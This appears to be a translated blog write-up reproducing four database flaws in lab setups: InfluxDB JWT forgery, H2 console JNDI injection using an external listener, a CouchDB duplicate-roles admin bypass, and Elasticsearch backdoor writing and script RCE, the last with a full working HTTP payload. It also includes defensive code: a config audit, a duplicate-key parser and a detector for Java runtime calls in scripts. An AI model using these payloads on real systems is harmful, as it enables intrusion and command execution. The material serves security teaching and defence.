Service Attack and Defense - Database Security - InfluxDB & H2database & CouchDB & ElasticSearch Database Vulnerability Reproduction

Table of contents

1. InfluxDB: unauthorized access through improper JWT verification
   1. Introduction to InfluxDB
   2. Security issues
   3. Vulnerability reproduction
2. H2database: unauthorized access through improper configuration
   1. Introduction to H2database
   2. Security issues
   3. Vulnerability reproduction
3. CouchDB: permission bypass and RCE vulnerability
   1. Introduction to CouchDB
   2. Security issues
   3. Vulnerability reproduction
4. Elasticsearch: file write and RCE vulnerabilities
   1. Introduction to Elasticsearch
   2. Vulnerability reproduction 1
   3. Vulnerability reproduction 2
5. Database security summary map


1. InfluxDB: unauthorized access through improper JWT verification

1. Introduction to InfluxDB

        Default ports: 8086, 8088.

        InfluxDB is an open-source time-series database designed to handle high write and query loads for large-scale data processing and analysis. It is optimized for storing and querying large amounts of time-stamped data in real time.

        InfluxDB provides a SQL-like query language called InfluxQL that allows users to retrieve and manipulate data from the database. It also supports various client libraries and plugins for integration with other data sources and tools.

        Some key features of InfluxDB include:

  • High write and query performance: InfluxDB is optimized for high-throughput data ingestion and retrieval, making it ideal for real-time data processing and analysis.

  • Data retention policy: InfluxDB allows users to set data retention policies to automatically expire old data, helping to manage database size and improve performance.

  • Tags and filtering: InfluxDB supports tags, which are key-value pairs that can be used to filter and group analysis data.

  • Continuous Queries: InfluxDB allows users to define continuous queries that run in the background and automatically calculate aggregated values from raw data.

  • InfluxDB Cloud: In addition to the open-source version of InfluxDB, there is also a cloud-hosted version called InfluxDB Cloud that provides a fully managed, scalable database-as-a-service solution.

        Overall, InfluxDB is a powerful tool for managing and analyzing time series data and is widely used in various industries such as finance, healthcare, and IoT.

2. Security issues

        When authentication is enabled but the shared-secret parameter is not set, InfluxDB uses an empty string as the key to sign and verify JWTs. An attacker can then forge a JWT for any user, impersonate that user, and execute SQL statements in InfluxDB, which can have serious consequences.

3. Vulnerability reproduction

        Start the lab environment.

        Scan the target's ports; port 8086 is open.

        Searching the Internet for this InfluxDB vulnerability turns up many reproduction tutorials.

        Open the site and append the content shown in the figure below to the URL; the following page is returned.

        Accessing the following path and sending the following parameters by POST pops up a login box, meaning this operation requires a logged-in, authorized user.

        Submitting nothing makes the page return the following error.

        Because the service is vulnerable to unauthorized access and that access is gated by a JWT, a token can be generated for the admin user whose exp claim (the token's expiration time) is later than the current time.

        Sign the following content at "JSON Web Tokens - jwt.io", leaving the key blank.

        Copy the token generated above and paste it into the request.

        After sending the request, you can see that the data has been queried successfully.

2. H2database: unauthorized access through improper configuration

1. Introduction to H2database

        Default port: 20051

        H2database is an open source Java embedded relational database management system (RDBMS), which is lightweight, high performance, and easy to use. It supports standard SQL language and JDBC API, can store data in memory or on disk, and provides advanced features such as transaction management, index, trigger, stored procedure, etc.

        Features of H2database include:

  • Embedded: H2database can be embedded in Java applications, so no independent database server or additional configuration is required, making applications easier to deploy and manage.

  • High performance: H2database is designed as a lightweight database, so it has very high performance and can handle a large number of data operations.

  • Support multiple modes: H2database supports many different modes, including memory mode, disk mode, mixed mode, etc. You can choose the most suitable storage mode according to specific application scenarios.

  • Compatibility: H2database fully supports standard SQL language and JDBC API, so it can be easily integrated with other database systems.

  • Scalability: H2database supports advanced features such as transaction management, indexing, triggers, and stored procedures. It also supports writing custom functions and stored procedures using Java code, so it is very flexible and scalable.

        In general, H2database is a feature-rich, easy-to-use, high-performance Java embedded relational database management system, suitable for various application scenarios, including mobile applications, desktop applications, web applications, etc.

2. Security issues

        H2 ships with a web management console that can be used to access and manage the database from a browser.

        In Spring development, setting the following two options to true lets external users reach the web console without authentication:

spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true

        spring.h2.console.enabled enables the H2 web console;

        spring.h2.console.settings.web-allow-others allows users on other hosts to access it.

        With both enabled, the console is exposed to attack: through it, JNDI injection can be used to execute arbitrary commands in the target environment.
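An added configuration check (not part of the original post or of Spring Boot): it reads a .properties file with a minimal parser and reports the two settings above, showing the weak configuration from the text beside a hardened one. Spring Boot's defaults for both keys are false, which the check relies on when a key is absent.

```python
import re

# key, optional separator (= or :), value; lines starting with # or ! are comments
_PROP_RE = re.compile(r"^\s*([^=:\s]+)\s*[=:]?\s*(.*?)\s*$")


def parse_properties(text):
    """Minimal reader for Java .properties files (one key per line, no continuations)."""
    props = {}
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped[0] in "#!":
            continue
        match = _PROP_RE.match(line)
        if match:
            props[match.group(1)] = match.group(2)
    return props


def audit_h2_console(props):
    """Return findings about H2 console exposure; an empty list means nothing to report."""
    def is_true(key):
        # Spring Boot defaults both options to false when they are absent.
        return props.get(key, "false").strip().lower() == "true"

    findings = []
    if is_true("spring.h2.console.enabled"):
        findings.append("spring.h2.console.enabled=true: the H2 web console is served by the application")
        if is_true("spring.h2.console.settings.web-allow-others"):
            findings.append("spring.h2.console.settings.web-allow-others=true: the console accepts remote clients")
    return findings


# Constructed samples: the weak settings quoted above, and a hardened equivalent.
WEAK_CONFIG = """
spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true
"""

HARDENED_CONFIG = """
# Keep the console off except in a local development profile, and never open it to other hosts.
spring.h2.console.enabled=false
spring.h2.console.settings.web-allow-others=false
"""

if __name__ == "__main__":
    for name, config in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_h2_console(parse_properties(config)) or "no findings")
```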

3. Vulnerability reproduction

        Start the lab environment.

        Download JNDI-Injection-Exploit from https://github.com/welk1n/JNDI-Injection-Exploit.git .


Supplement:

        JNDI injection is an attack that abuses the Java Naming and Directory Interface (JNDI) to achieve remote command execution (RCE). The attacker injects a reference to a malicious JNDI object into the target application; when the application resolves that object, the malicious code runs.

        Tools exist that automatically generate malicious JNDI objects and inject them into the target application. JNDI-Injection-Exploit is one such automated tool for exploiting JNDI injection to achieve remote command execution.

        -C: the command executed by the remote class file.

        -A: the server address, either an IP address or a domain name.


        After downloading and running the tool on the desktop, a JNDI link is generated.

        Copy the link and open the console; you can see that a login is required.

        First check the current directory on the server.

        Change the contents of the two boxes shown in the figure below to the following.

        Click "Connect".

        Check the server's directory again: nothing has changed.

        Checking the listener shows that nothing was received.

        Why?

        The jar is fetched remotely during the attack, but the listener is running locally, so nothing new appears on the server. The listener has to run on a host reachable from the target (an external-network host); then it succeeds.

        Generate and listen again on the external-network host, and copy the link.

        Paste it into the same place again and click "Connect".

        This time the listener receives the connection.

        A file has also been added to the file directory.

3. CouchDB: permission bypass and RCE vulnerability

1. Introduction to CouchDB

        Default port: 5984

        CouchDB is a document-oriented NoSQL database that uses JSON as the document data format and uses RESTful APIs to provide data access interfaces. Following are some of the features and benefits of CouchDB:

  • Distributed database: CouchDB is a distributed database that supports multi-node replication and synchronization, and can realize data backup and recovery between different servers.
  • Document-oriented: CouchDB adopts a document-oriented data model. Each document is a self-contained data structure that can store any type of data without following a fixed table structure.
  • RESTful API: CouchDB uses RESTful API to provide data access interface, supports HTTP protocol, and can perform data operations through simple HTTP requests.
  • MapReduce view: CouchDB uses MapReduce view to process and query data, and can perform association query and aggregate calculation between different documents.
  • ACID transaction support: CouchDB supports ACID transaction features, which can ensure data consistency, reliability and recoverability.
  • Scalability: CouchDB has good scalability and flexibility, and can be expanded horizontally and vertically as needed.
  • Open source and free: CouchDB is an open source and free database software that can be used and modified on various platforms for free.

        CouchDB is suitable for application scenarios that need to store and process unstructured data, such as web applications, mobile applications, social networks, and collaborative office. Since CouchDB has good scalability and distributed characteristics, it is also suitable for application scenarios that need to process large-scale data and high concurrent requests.

2. Security issues

        Because Erlang and JavaScript parse JSON differently, the same request is interpreted differently by the two sides. This lets any user create an administrator, which is a vertical permission bypass vulnerability.

3. Vulnerability reproduction

        Start the lab environment.

        After visiting, you can see the following page.

        Capture the request and change it to the following form; at this point it fails.

        Modify the request again and send one that contains two roles fields to bypass the restriction; this time it succeeds and the administrator account is created. The account name and password are both "vulhub".

        Enter the address below, enter the account name and password, and click Login.

        You can see that the login succeeded.
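The parser disagreement behind this bypass can be shown directly. As an added example (not CouchDB's code), the document below is constructed in the shape the text describes, with the roles field given twice: one of CouchDB's two sides keeps the first value, the other keeps the last, and a validation layer should instead reject such a document outright, as the strict mode does.

```python
import json


def reject_duplicate_keys(pairs):
    """object_pairs_hook for json.loads: refuse any object that repeats a key."""
    obj = {}
    for key, value in pairs:
        if key in obj:
            raise ValueError(f"duplicate key {key!r} in JSON object")
        obj[key] = value
    return obj


def first_key_wins(pairs):
    """Keep the first occurrence of each key (one parser's view of the document)."""
    obj = {}
    for key, value in pairs:
        obj.setdefault(key, value)
    return obj


def last_key_wins(pairs):
    """Keep the last occurrence of each key (the other parser's view, like JSON.parse)."""
    return dict(pairs)


def parse_user_doc(body, mode="strict"):
    hook = {"strict": reject_duplicate_keys, "first": first_key_wins, "last": last_key_wins}[mode]
    return json.loads(body, object_pairs_hook=hook)


# Constructed example document in the shape the text describes: the roles field appears twice.
DUPLICATE_ROLES_DOC = (
    '{"type": "user", "name": "vulhub", "roles": ["_admin"], "roles": [], '
    '"password": "vulhub"}'
)


def roles_seen_by(mode):
    """Which roles list a parser in the given mode would act on."""
    return parse_user_doc(DUPLICATE_ROLES_DOC, mode)["roles"]
```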

4. Elasticsearch: file write and RCE vulnerabilities

1. Introduction to Elasticsearch

        Default ports: 9200, 9300

        Elasticsearch is a Lucene-based search engine and a distributed document storage and analysis engine. Following are some of the features and benefits of Elasticsearch:

  • Distributed architecture: Elasticsearch adopts a distributed architecture, which can store and process data on multiple nodes and support horizontal expansion of data.
  • Real-time search: Elasticsearch provides real-time search and analysis functions, and can return search results within milliseconds.
  • Multiple data source support: Elasticsearch supports multiple data sources, including structured data and unstructured data, and can store and process various types of data.
  • Full-text search: Elasticsearch adopts full-text search engine technology and supports functions such as text word segmentation, approximate matching, and aggregation analysis.
  • RESTful API: Elasticsearch provides a RESTful API interface, which can perform data manipulation and query through HTTP requests.
  • Big data processing: Elasticsearch supports large-scale data storage and processing, and can handle PB-level data.
  • Real-time monitoring and analysis: Elasticsearch provides real-time monitoring and analysis functions, which can monitor and analyze data in real time, helping users quickly find and solve problems.
  • Open source and free: Elasticsearch is an open source and free software that can be used and modified for free on various platforms.

        Elasticsearch is suitable for application scenarios that require searching, analyzing, and processing large amounts of data, such as log analysis, search engines, e-commerce sites, social networks, and the Internet of Things. Since Elasticsearch has good scalability and distributed features, it is also suitable for application scenarios that need to process large-scale data and high concurrent requests.

2. Vulnerability reproduction 1

        Find the corresponding environment in the online lab.

        Start the environment.

        Port 9200 is the usual Elasticsearch port, and this vulnerable environment has to be used together with middleware.

        An Elasticsearch page is found on port 9200 and a Tomcat directory on port 8080.

        Use Elasticsearch to write the backdoor to usr/local/tomcat/webapps/wwwroot/ (the figures show the target path and the configuration used).

        Access the corresponding address and use the parameter f to control the content to be written.

        Access the corresponding path, and you can see that the parameter content has been written successfully.

3. Vulnerability reproduction 2

        Find the corresponding environment in the online lab and start it.

        The vulnerability requires at least one document in Elasticsearch, so first create one.

        Open the lab address and capture the request.

        Change the request to the following form and forward it.

POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "phithon"
}

        Then change the request to the following form and forward it; you can see that the command has been executed successfully.

POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 343

{
    "size": 1,
    "query": {
      "filtered": {
        "query": {
          "match_all": {
          }
        }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id\").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
}
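A detection-side example, added here and not part of the original post, for the request shape shown above: it walks a parsed search body, collects every inline script (a `script` string, or a `script` object with `inline`/`source`), and flags scripts that reach into Java runtime APIs. The sample bodies are constructed, and the suspicious-pattern list is an assumption to be tuned per deployment.

```python
import json
import re

# Java API fragments that have no business in a search-time script (assumed starting list).
SUSPICIOUS = re.compile(r"Runtime\.getRuntime|ProcessBuilder|java\.io\.|java\.lang\.|\.exec\(")


def find_inline_scripts(node, path="$"):
    """Walk a parsed request body; return (json_path, script_text) for every inline script."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}"
            if key == "script":
                if isinstance(value, str):
                    hits.append((child, value))
                elif isinstance(value, dict):
                    src = value.get("inline", value.get("source"))
                    if isinstance(src, str):
                        hits.append((child, src))
            hits.extend(find_inline_scripts(value, child))
    elif isinstance(node, list):
        for idx, value in enumerate(node):
            hits.extend(find_inline_scripts(value, f"{path}[{idx}]"))
    return hits


def classify_search_body(body):
    """Summarise one _search body so a log-review job can alert on it."""
    scripts = find_inline_scripts(json.loads(body))
    return {
        "inline_scripts": len(scripts),
        "dangerous": [path for path, text in scripts if SUSPICIOUS.search(text)],
    }


# Constructed samples: a benign query, and the shape of the script_fields request shown above.
BENIGN_BODY = json.dumps({"size": 1, "query": {"match": {"name": "phithon"}}})
SCRIPT_BODY = json.dumps({
    "size": 1,
    "query": {"filtered": {"query": {"match_all": {}}}},
    "script_fields": {"command": {"script":
        'new java.util.Scanner(Runtime.getRuntime().exec("id").getInputStream()).next();'}},
})

if __name__ == "__main__":
    for body in (BENIGN_BODY, SCRIPT_BODY):
        print(classify_search_body(body))
```

On the Elasticsearch 1.x line this request only works while dynamic scripting is enabled, so alongside detection, disabling it (`script.disable_dynamic: true`) removes the primitive.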

5. Database security summary map


This article is a continuation of the previous article: https://blog.csdn.net/weixin_62808713/article/details/130444142



Origin blog.csdn.net/weixin_62808713/article/details/130451511